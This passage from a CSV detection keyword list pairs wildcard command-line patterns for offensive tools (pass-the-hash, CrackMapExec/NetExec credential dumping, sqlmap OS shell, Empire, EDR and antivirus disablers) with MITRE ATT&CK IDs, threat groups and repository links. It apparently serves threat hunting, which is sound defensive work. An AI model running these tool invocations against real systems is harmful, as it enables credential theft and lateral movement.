TA0008,N/A,N/A,Reconnaissance,https://github.com/yaap7/ldapsearch-ad,1,0,N/A,N/A,2,123,26,2023-05-10T13:30:16Z,2019-12-08T00:25:57Z -* -Type SMBClient -Target * -TargetExclude * -Username * -Hash *,offensive_tool_keyword,Invoke-TheHash,Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.,T1028 - T1047 - T1075 - T1078,TA0003 - TA0004 - TA0006,N/A,N/A,Lateral movement,https://github.com/Kevin-Robertson/Invoke-TheHash,1,0,N/A,10,10,1345,308,2018-12-09T15:38:36Z,2017-01-03T01:05:39Z -* -Type SMBEnum -Target * -TargetExclude * -Username * -Hash *,offensive_tool_keyword,Invoke-TheHash,Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.,T1028 - T1047 - T1075 - T1078,TA0003 - TA0004 - TA0006,N/A,N/A,Lateral movement,https://github.com/Kevin-Robertson/Invoke-TheHash,1,0,N/A,10,10,1345,308,2018-12-09T15:38:36Z,2017-01-03T01:05:39Z -* -Type SMBExec -Target * -TargetExclude * -Username * -Hash *,offensive_tool_keyword,Invoke-TheHash,Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.,T1028 - T1047 - T1075 - T1078,TA0003 - TA0004 - TA0006,N/A,N/A,Lateral movement,https://github.com/Kevin-Robertson/Invoke-TheHash,1,0,N/A,10,10,1345,308,2018-12-09T15:38:36Z,2017-01-03T01:05:39Z -* -type user -search * -DomainController * -Credential * -list yes*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Get-SPN.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* -Type WMIExec -Target * -TargetExclude * -Username * -Hash *,offensive_tool_keyword,Invoke-TheHash,Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.,T1028 - T1047 - T1075 - T1078,TA0003 - TA0004 - TA0006,N/A,N/A,Lateral movement,https://github.com/Kevin-Robertson/Invoke-TheHash,1,0,N/A,10,10,1345,308,2018-12-09T15:38:36Z,2017-01-03T01:05:39Z -"* -u * -d * --dc-ip * -k --no-pass --target * --action ""list""*",offensive_tool_keyword,pywhisker,Python version of the C# tool for Shadow Credentials attacks,T1552.001 - T1136 - T1098,TA0003 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/ShutdownRepo/pywhisker,1,0,N/A,10,5,418,49,2023-10-03T14:10:17Z,2021-07-21T19:20:00Z -* -u * --local-auth*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* -u * -p * --lusers*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* -u * -p * -M handlekatz*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* -u * -p * -M nanodump*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* -u * -p * -M ntdsutil*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* -u * -p * --sam,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* -u * -p * --shares*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* -u * -p *--pass-pol*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* -u *http* --dbs,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -* -u *http* --os-shell*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -* -u FUZZ *,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -* -u http* -f *.dll * -p *,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -* -U msf -P msf *,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,0,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -* -u wordlist * wordlist_uniq_sorted*,offensive_tool_keyword,wordlists,Various wordlists FR & EN - Cracking French passwords,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/clem9669/wordlists,1,0,N/A,N/A,2,191,44,2023-10-03T14:28:50Z,2020-10-21T14:37:53Z -* uberfile.py *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* ubiquiti-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --unconstrained-users*,offensive_tool_keyword,windapsearch,Python script to enumerate users - groups and computers from a Windows domain through LDAP queries,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/ropnop/windapsearch,1,0,N/A,N/A,7,666,134,2022-04-20T07:40:42Z,2016-08-10T21:43:30Z -* unDefender.exe*,offensive_tool_keyword,unDefender,Killing your preferred antimalware by abusing native symbolic links and NT paths.,T1562.001 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/APTortellini/unDefender,1,0,N/A,10,4,309,78,2022-01-29T12:35:31Z,2021-08-21T14:45:39Z -* -unhook -antidebug * -self -sleep*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* -unhook -syscalls -obfuscate *,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* --unhook-method * --dont-unload-driver * --dump-output *,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,0,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -* unicorn.py*,offensive_tool_keyword,unicorn,Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory,T1059.001 - T1055.012 - T1027.002 - T1547.009,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/trustedsec/unicorn,1,0,N/A,N/A,10,3503,839,2023-09-15T05:43:27Z,2013-06-19T08:38:06Z -* --union-char *GsFRts2*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -* unittest.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* unusual-port.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* upnp-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* uptime-agent-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -UrbanBishop -Command *,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* --url * --attacker *,offensive_tool_keyword,POC,VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887),T1068 - T1190.001 - T1210.002 - T1059.001 - T1059.003 - T1190 - T1569.002,TA0005 - TA0002 - TA0001 - TA0040 - TA0043,N/A,N/A,Exploitation tools,https://github.com/sinsinology/CVE-2023-20887,1,0,N/A,N/A,3,219,44,2023-06-13T14:39:17Z,2023-06-13T13:17:23Z -* --url --password SIMPLEPASS*,offensive_tool_keyword,IIS-Raid,A native backdoor module for Microsoft IIS,T1505.003 - T1059.001 - T1071.001,TA0002 - TA0011,N/A,N/A,C2,https://github.com/0x09AL/IIS-Raid,1,0,N/A,10,10,510,127,2020-07-03T13:31:42Z,2020-02-17T16:28:10Z -* -urlcache */debase64/*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -* url-snarf.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* Use-DarkHotel*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -* -user * --passwordlist *,offensive_tool_keyword,adfspray,Python3 tool to perform password spraying against Microsoft Online service using various methods,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/xFreed0m/ADFSpray,1,0,N/A,N/A,1,75,14,2023-03-12T00:21:34Z,2020-04-23T08:56:51Z -* userenum * --dc *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -Username * -Hash * -Command *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-SMBExec.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* -Username * -Password * -Command * -LogonType *,offensive_tool_keyword,RunasCs,RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential,T1055 - T1134.001,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs,1,0,N/A,N/A,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -* --UserName * --Password * --Payload *.exe*,offensive_tool_keyword,SplunkWhisperer2,Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations,T1068 - T1059.003 - T1071.001,TA0003 - TA0002 - TA0011,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cnotin/SplunkWhisperer2,1,0,N/A,9,3,239,53,2022-09-30T16:41:17Z,2019-02-24T18:05:51Z -* -UserPersistenceOption *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Persistence.psm1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* --user-spns*,offensive_tool_keyword,windapsearch,Python script to enumerate users - groups and computers from a Windows domain through LDAP queries,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/ropnop/windapsearch,1,0,N/A,N/A,7,666,134,2022-04-20T07:40:42Z,2016-08-10T21:43:30Z -* UUID_bypass.py*,offensive_tool_keyword,FourEye,AV Evasion Tool,T1059 - T1059.001 - T1059.005 - T1027 - T1027.005,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/lengjibo/FourEye,1,0,N/A,10,8,724,154,2021-12-08T11:55:15Z,2020-12-11T01:29:58Z -* -VaultElementPtr *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* vaults /target:* 